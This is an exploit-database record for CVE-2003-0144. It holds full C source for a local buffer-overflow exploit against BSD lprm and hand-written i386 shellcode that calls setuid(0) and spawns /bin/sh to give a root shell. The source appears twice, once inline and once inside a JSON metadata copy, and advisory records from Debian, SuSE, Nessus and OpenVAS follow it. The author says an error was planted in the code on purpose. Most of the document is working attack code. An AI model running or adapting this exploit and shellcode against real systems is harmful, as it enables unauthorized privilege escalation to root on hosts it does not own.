BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability 1
1998-04-22T00:00:00
ID EDB-ID:22331 Type exploitdb Reporter Niall Smart Modified 1998-04-22T00:00:00
Description
BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 Local Buffer Overflow Vulnerability (1). CVE-2003-0144. Local exploit for unix platform
source: http://www.securityfocus.com/bid/7025/info
It has been reported that a vulnerability in the handling of some types of requests exists in lprm. When an attacker sends a maliciously crafted string to a configured printer through the lprm command, it may be possible to execute code.
/*
lprm-bsd.c - Exploit for lprm vulnerability in
OpenBSD and FreeBSD-stable
k0ded by Niall Smart, njs3@doc.ic.ac.uk, 1998.
The original version of this file contains a blatant error
which anyone who is capable of understanding C will be able
to locate and remove. Please do not distribute this file
without this idiot-avoidance measure.
Typical egg on FreeBSD: 0xEFBFCFDF
Typical egg on OpenBSD: 0xEFBFD648
The exploit might take a while to drop you to a root shell
depending on the timeout ("tm" capability) specified in the
printcap file.
*/
#include <sys/types.h>
#include <pwd.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
extern void BEGIN_SC();
extern void END_SC();
int
main(int argc, char** argv)
{
char buf[4096];
struct passwd* pw;
char* cgstr;
char* cgbuf;
char* printer;
char* printcaps[] = { "/etc/printcap", 0 };
int sc_size; /* size of shell code */
int P; /* strlen(RP) + strlen(person) */
unsigned egg; /* value to overwrite saved EIP with */
if (argc != 3) {
fprintf(stderr, "usage: %s <printername> <egg>\n", argv[0]);
exit(0);
}
if ( (pw = getpwuid(getuid())) == NULL)
errx(1, "no password entry for your user-id");
printer = argv[1];
egg = (unsigned) strtoul(argv[2], NULL, 0);
if (cgetent(&cgstr, printcaps, printer) < 0)
errx(1, "can't find printer: %s", printer);
if (cgetstr(cgstr, "rm", &cgbuf) < 0 || cgbuf[0] == '\0')
errx(1, "printer is not remote: %s", printer);
if (cgetstr(cgstr, "rp", &cgbuf) < 0)
cgbuf = "lp";
sc_size = (char*) END_SC - (char*) BEGIN_SC;
/* We can append 1022 bytes to whatever is in the buffer.
We need to get up to 1032 bytes to reach the saved EIP,
so there must be at least 10 bytes placed in the buffer
by the snprintf on line 337 of rmjob.c and the subsequent
*cp++ = '\0'; 3 = ' ' + ' ' + '\5' */
if ( (P = (strlen(pw->pw_name) + strlen(cgbuf))) < 7)
errx(1, "your username is too short");
fprintf(stderr, "P = %d\n", P);
fprintf(stderr, "shellcode = %d bytes @ %d\n", sc_size, 1028 - P - 3 - 12 - sc_size);
fprintf(stderr, "egg = 0x%X@%d\n", egg, 1028 - P - 3);
/* fill with NOP */
memset(buf, 0x90, sizeof(buf));
/* put letter in first byte, this fucker took me eight hours to debug. */
buf[0] = 'A';
/* copy in shellcode, we leave 12 bytes for the four pushes before the int 0x80 */
memcpy(buf + 1028 - P - 3 - 12 - sc_size, (void*) BEGIN_SC, sc_size);
/* finally, set egg and null terminate */
*((int*)&buf[1028 - P - 3]) = egg;
buf[1022] = '\0';
memset(buf, 0, sizeof(buf));
execl("/usr/bin/lprm", "lprm", "-P", printer, buf, 0);
fprintf(stderr, "doh.\n");
return 0;
}
/*
shellcode.S - generic i386 shell code
k0d3d by Niall Smart, njs3@doc.ic.ac.uk, 1998.
Please send me platform-specific mods.
Example use:
#include <stdio.h>
#include <string.h>
extern void BEGIN_SC();
extern void END_SC();
int
main()
{
char buf[1024];
memcpy(buf, (void*) BEGIN_SC, (long) END_SC - (long) BEGIN_SC);
((void (*)(void)) buf)();
return 0;
}
gcc -Wall main.c shellcode.S -o main && ./main
*/
#if defined(__FreeBSD__) || defined(__OpenBSD__)
#define EXECVE 3B
#define EXIT 01
#define SETUID 17
#define SETEUID B7
#define KERNCALL int $0x80
#else
#error This OS not currently supported.
#endif
#define _EXECVE_A CONCAT($0x555555, EXECVE)
#define _EXECVE_B CONCAT($0xAAAAAA, EXECVE)
#define _EXIT_A CONCAT($0x555555, EXIT)
#define _EXIT_B CONCAT($0xAAAAAA, EXIT)
#define _SETUID_A CONCAT($0x555555, SETUID)
#define _SETUID_B CONCAT($0xAAAAAA, SETUID)
#define _SETEUID_A CONCAT($0x555555, SETEUID)
#define _SETEUID_B CONCAT($0xAAAAAA, SETEUID)
#define CONCAT(x, y) CONCAT2(x, y)
#define CONCAT2(x, y) x ## y
.global _BEGIN_SC
.global _END_SC
.data
_BEGIN_SC: jmp 0x4 // jump past next two isns
movl (%esp), %eax // copy saved EIP to eax
ret // return to caller
xorl %ebx, %ebx // zero ebx
pushl %ebx // sete?uid(0)
pushl %ebx // dummy, kernel expects extra frame pointer
movl _SETEUID_A, %eax //
andl _SETEUID_B, %eax // load syscall number
KERNCALL // make the call
movl _SETUID_A, %eax //
andl _SETUID_B, %eax // load syscall number
KERNCALL // make the call
subl $-8, %esp // push stack back up
call -40 // call, pushing addr of next isn onto stack
addl $53, %eax // make eax point to the string
movb %bl, 2(%eax) // append '\0' to "sh"
movb %bl, 11(%eax) // append '\0' to "/bin/sh"
movl %eax, 12(%eax) // argv[0] = "sh"
movl %ebx, 16(%eax) // argv[1] = 0
pushl %ebx // push envv
movl %eax, %ebx //
subl $-12, %ebx // -(-12) = 12, avoid null bytes
pushl %ebx // push argv
subl $-4, %eax // -(-4) = 4, avoid null bytes
pushl %eax // push path
pushl %eax // dummy, kernel expects extra frame pointer
movl _EXECVE_A, %eax //
andl _EXECVE_B, %eax // load syscall number
KERNCALL // make the call
pushl %eax // push return code from execve
pushl %eax //
movl _EXIT_A, %eax // we shouldn't have gotten here, try and
andl _EXIT_B, %eax // exit with return code from execve
KERNCALL // JERONIMO!
.ascii "shAA/bin/shBCCCCDDDD"
// 01234567890123456789
_END_SC:
{"hash": "316e42f4d752b29f7f1c6e4791aae2f73a87d259f5d1cbf19ffee978039425fd", "id": "EDB-ID:22331", "lastseen": "2016-02-02T18:30:25", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/22331/", "description": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 Local Buffer Overflow Vulnerability (1). CVE-2003-0144. Local exploit for unix platform", "title": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/7025/info\r\n\r\nIt has been reported that a vulnerability in the handling of some types of requests exists in lprm. When an attacker sends a maliciously crafted string to a configured printer through the lprm command, it may be possible to execute code.\r\n\r\n/*\r\n lprm-bsd.c - Exploit for lprm vulnerability in\r\n OpenBSD and FreeBSD-stable\r\n\r\n k0ded by Niall Smart, njs3@doc.ic.ac.uk, 1998.\r\n\r\n The original version of this file contains a blatant error\r\n which anyone who is capable of understanding C will be able\r\n to locate and remove. Please do not distribute this file\r\n without this idiot-avoidance measure.\r\n\r\n Typical egg on FreeBSD: 0xEFBFCFDF\r\n Typical egg on OpenBSD: 0xEFBFD648\r\n\r\n The exploit might take a while to drop you to a root shell\r\n depending on the timeout (\"tm\" capability) specified in the\r\n printcap file.\r\n*/\r\n\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nextern void BEGIN_SC();\r\nextern void END_SC();\r\n\r\nint\r\nmain(int argc, char** argv)\r\n{\r\n char buf[4096];\r\n struct passwd* pw;\r\n char* cgstr;\r\n char* cgbuf;\r\n char* printer;\r\n char* printcaps[] = { \"/etc/printcap\", 0 };\r\n int sc_size; /* size of shell code */\r\n int P; /* strlen(RP) + strlen(person) */\r\n unsigned egg; /* value to overwrite saved EIP with */\r\n\r\n if (argc != 3) {\r\n fprintf(stderr, \"usage: %s <printername> <egg>\\n\", argv[0]);\r\n exit(0);\r\n }\r\n\r\n if ( (pw = getpwuid(getuid())) == NULL)\r\n errx(1, \"no password entry for your user-id\");\r\n\r\n printer = argv[1];\r\n egg = (unsigned) strtoul(argv[2], NULL, 0);\r\n\r\n if (cgetent(&cgstr, printcaps, printer) < 0)\r\n errx(1, \"can't find printer: %s\", printer);\r\n\r\n if (cgetstr(cgstr, \"rm\", &cgbuf) < 0 || cgbuf[0] == '\\0')\r\n errx(1, \"printer is not remote: %s\", printer);\r\n\r\n if (cgetstr(cgstr, \"rp\", &cgbuf) < 0)\r\n cgbuf = \"lp\";\r\n\r\n sc_size = (char*) END_SC - (char*) BEGIN_SC;\r\n\r\n /* We can append 1022 bytes to whatever is in the buffer.\r\n We need to get up to 1032 bytes to reach the saved EIP,\r\n so there must be at least 10 bytes placed in the buffer\r\n by the snprintf on line 337 of rmjob.c and the subsequent\r\n *cp++ = '\\0'; 3 = ' ' + ' ' + '\\5' */\r\n\r\n if ( (P = (strlen(pw->pw_name) + strlen(cgbuf))) < 7)\r\n errx(1, \"your username is too short\");\r\n\r\n fprintf(stderr, \"P = %d\\n\", P);\r\n fprintf(stderr, \"shellcode = %d bytes @ %d\\n\", sc_size, 1028 - P - 3 - 12 - sc_size);\r\n fprintf(stderr, \"egg = 0x%X@%d\\n\", egg, 1028 - P - 3);\r\n\r\n /* fill with NOP */\r\n memset(buf, 0x90, sizeof(buf));\r\n /* put letter in first byte, this fucker took me eight hours to debug. */\r\n buf[0] = 'A';\r\n /* copy in shellcode, we leave 12 bytes for the four pushes before the int 0x80 */\r\n memcpy(buf + 1028 - P - 3 - 12 - sc_size, (void*) BEGIN_SC, sc_size);\r\n /* finally, set egg and null terminate */\r\n *((int*)&buf[1028 - P - 3]) = egg;\r\n buf[1022] = '\\0';\r\n\r\n memset(buf, 0, sizeof(buf));\r\n\r\n execl(\"/usr/bin/lprm\", \"lprm\", \"-P\", printer, buf, 0);\r\n\r\n fprintf(stderr, \"doh.\\n\");\r\n\r\n return 0;\r\n}\r\n\r\n\r\n/*\r\n shellcode.S - generic i386 shell code\r\n\r\n k0d3d by Niall Smart, njs3@doc.ic.ac.uk, 1998.\r\n Please send me platform-specific mods.\r\n\r\n Example use:\r\n\r\n #include <stdio.h>\r\n #include <string.h>\r\n\r\n extern void BEGIN_SC();\r\n extern void END_SC();\r\n\r\n int\r\n main()\r\n {\r\n char buf[1024];\r\n\r\n memcpy(buf, (void*) BEGIN_SC, (long) END_SC - (long) BEGIN_SC);\r\n\r\n ((void (*)(void)) buf)();\r\n\r\n return 0;\r\n }\r\n\r\n gcc -Wall main.c shellcode.S -o main && ./main\r\n*/\r\n\r\n\r\n#if defined(__FreeBSD__) || defined(__OpenBSD__)\r\n#define EXECVE 3B\r\n#define EXIT 01\r\n#define SETUID 17\r\n#define SETEUID B7\r\n#define KERNCALL int $0x80\r\n#else\r\n#error This OS not currently supported.\r\n#endif\r\n\r\n#define _EXECVE_A CONCAT($0x555555, EXECVE)\r\n#define _EXECVE_B CONCAT($0xAAAAAA, EXECVE)\r\n#define _EXIT_A CONCAT($0x555555, EXIT)\r\n#define _EXIT_B CONCAT($0xAAAAAA, EXIT)\r\n#define _SETUID_A CONCAT($0x555555, SETUID)\r\n#define _SETUID_B CONCAT($0xAAAAAA, SETUID)\r\n#define _SETEUID_A CONCAT($0x555555, SETEUID)\r\n#define _SETEUID_B CONCAT($0xAAAAAA, SETEUID)\r\n\r\n#define CONCAT(x, y) CONCAT2(x, y)\r\n#define CONCAT2(x, y) x ## y\r\n\r\n.global _BEGIN_SC\r\n.global _END_SC\r\n\r\n .data\r\n_BEGIN_SC: jmp 0x4 // jump past next two isns\r\n movl (%esp), %eax // copy saved EIP to eax\r\n ret // return to caller\r\n xorl %ebx, %ebx // zero ebx\r\n pushl %ebx // sete?uid(0)\r\n pushl %ebx // dummy, kernel expects extra frame pointer\r\n movl _SETEUID_A, %eax //\r\n andl _SETEUID_B, %eax // load syscall number\r\n KERNCALL // make the call\r\n movl _SETUID_A, %eax //\r\n andl _SETUID_B, %eax // load syscall number\r\n KERNCALL // make the call\r\n subl $-8, %esp // push stack back up\r\n call -40 // call, pushing addr of next isn onto stack\r\n addl $53, %eax // make eax point to the string\r\n movb %bl, 2(%eax) // append '\\0' to \"sh\"\r\n movb %bl, 11(%eax) // append '\\0' to \"/bin/sh\"\r\n movl %eax, 12(%eax) // argv[0] = \"sh\"\r\n movl %ebx, 16(%eax) // argv[1] = 0\r\n pushl %ebx // push envv\r\n movl %eax, %ebx //\r\n subl $-12, %ebx // -(-12) = 12, avoid null bytes\r\n pushl %ebx // push argv\r\n subl $-4, %eax // -(-4) = 4, avoid null bytes\r\n pushl %eax // push path\r\n pushl %eax // dummy, kernel expects extra frame pointer\r\n movl _EXECVE_A, %eax //\r\n andl _EXECVE_B, %eax // load syscall number\r\n KERNCALL // make the call\r\n pushl %eax // push return code from execve\r\n pushl %eax //\r\n movl _EXIT_A, %eax // we shouldn't have gotten here, try and\r\n andl _EXIT_B, %eax // exit with return code from execve\r\n KERNCALL // JERONIMO!\r\n .ascii \"shAA/bin/shBCCCCDDDD\"\r\n // 01234567890123456789\r\n_END_SC:", "objectVersion": "1.0", "cvelist": ["CVE-2003-0144"], "published": "1998-04-22T00:00:00", "osvdbidlist": ["7549"], "references": [], "reporter": "Niall Smart", "modified": "1998-04-22T00:00:00", "href": "https://www.exploit-db.com/exploits/22331/"}
{"result": {"cve": [{"id": "CVE-2003-0144", "type": "cve", "title": "CVE-2003-0144", "description": "Buffer overflow in the lprm command in the lprold lpr package on SuSE 7.1 through 7.3, OpenBSD 3.2 and earlier, and possibly other operating systems, allows local users to gain root privileges via long command line arguments such as (1) request ID or (2) user name.", "published": "2003-03-31T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0144", "cvelist": ["CVE-2003-0144"], "lastseen": "2017-07-11T11:14:15"}], "debian": [{"id": "DSA-267", "type": "debian", "title": "lpr -- buffer overflow", "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.\n\nFor the stable distribution (woody) this problem has been fixed in version 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed in version 0.48-1.1.\n\nFor the unstable distribution (sid) this problem has been fixed in version 2000.05.07-4.20.\n\nWe recommend that you upgrade your lpr package immediately.", "published": "2003-03-24T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.debian.org/security/dsa-267", "cvelist": ["CVE-2003-0144"], "lastseen": "2016-09-02T18:29:10"}, {"id": "DSA-275", "type": "debian", "title": "lpr-ppd -- buffer overflow", "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.\n\nFor the stable distribution (woody) this problem has been fixed in version 0.72-2.1.\n\nThe old stable distribution (potato) does not contain lpr-ppd packages.\n\nFor the unstable distribution (sid) this problem has been fixed in version 0.72-3.\n\nWe recommend that you upgrade your lpr-ppd package immediately.", "published": "2003-04-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.debian.org/security/dsa-275", "cvelist": ["CVE-2003-0144"], "lastseen": "2016-09-02T18:26:35"}], "osvdb": [{"id": "OSVDB:7549", "type": "osvdb", "title": "lprold lpr Package lprm Command Line Overflow", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.openbsd.org/errata32.html#lprm)\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=104690434504429&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=104714441925019&w=2\nMail List Post: http://marc.info/?l=bugtraq&m=104690434504429&w=2\nISS X-Force ID: 11473\n[CVE-2003-0144](https://vulners.com/cve/CVE-2003-0144)\nBugtraq ID: 7025\n", "published": "2003-03-05T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:7549", "cvelist": ["CVE-2003-0144"], "lastseen": "2017-04-28T13:20:02"}], "nessus": [{"id": "DEBIAN_DSA-267.NASL", "type": "nessus", "title": "Debian DSA-267-1 : lpr - buffer overflow", "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.", "published": "2004-09-29T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=15104", "cvelist": ["CVE-2003-0144"], "lastseen": "2017-10-29T13:43:49"}, {"id": "DEBIAN_DSA-275.NASL", "type": "nessus", "title": "Debian DSA-275-1 : lpr-ppd - buffer overflow", "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.", "published": "2004-09-29T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=15112", "cvelist": ["CVE-2003-0144"], "lastseen": "2017-10-29T13:40:01"}, {"id": "MANDRAKE_MDKSA-2003-059.NASL", "type": "nessus", "title": "Mandrake Linux Security Advisory : lpr (MDKSA-2003:059)", "description": "A buffer overflow was discovered in the lpr printer spooling system that can be exploited by a local user to gain root privileges. This can be done even if the printer is configured properly.", "published": "2012-09-06T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=61920", "cvelist": ["CVE-2003-0144"], "lastseen": "2017-10-29T13:36:59"}], "exploitdb": [{"id": "EDB-ID:22332", "type": "exploitdb", "title": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability 2", "description": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 Local Buffer Overflow Vulnerability (2). CVE-2003-0144. Local exploit for unix platform", "published": "1998-04-22T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/22332/", "cvelist": ["CVE-2003-0144"], "lastseen": "2016-02-02T18:30:34"}], "openvas": [{"id": "OPENVAS:53358", "type": "openvas", "title": "Debian Security Advisory DSA 267-2 (lpr)", "description": "The remote host is missing an update to lpr\nannounced via advisory DSA 267-2.", "published": "2008-01-17T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=53358", "cvelist": ["CVE-2003-0144"], "lastseen": "2017-07-24T12:50:11"}, {"id": "OPENVAS:53344", "type": "openvas", "title": "Debian Security Advisory DSA 275-1 (lpr-ppd)", "description": "The remote host is missing an update to lpr-ppd\nannounced via advisory DSA 275-1.", "published": "2008-01-17T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=53344", "cvelist": ["CVE-2003-0144"], "lastseen": "2017-07-24T12:50:16"}, {"id": "OPENVAS:53338", "type": "openvas", "title": "Debian Security Advisory DSA 267-1 (lpr)", "description": "The remote host is missing an update to lpr\nannounced via advisory DSA 267-1.", "published": "2008-01-17T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=53338", "cvelist": ["CVE-2003-0144"], "lastseen": "2017-07-24T12:50:23"}], "suse": [{"id": "SUSE-SA:2003:0014", "type": "suse", "title": "local privilege escalation in lprold", "description": "The lprm command of the printing package lprold shipped till SuSE 7.3 contains a buffer overflow. This buffer overflow can be exploited by a local user, if the printer system is set up correctly, to gain root privileges. lprold is installed as default package and has the setuid bit set.", "published": "2003-03-13T16:07:16", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2003-03/msg00015.html", "cvelist": ["CVE-2003-0144"], "lastseen": "2016-09-04T11:27:55"}]}}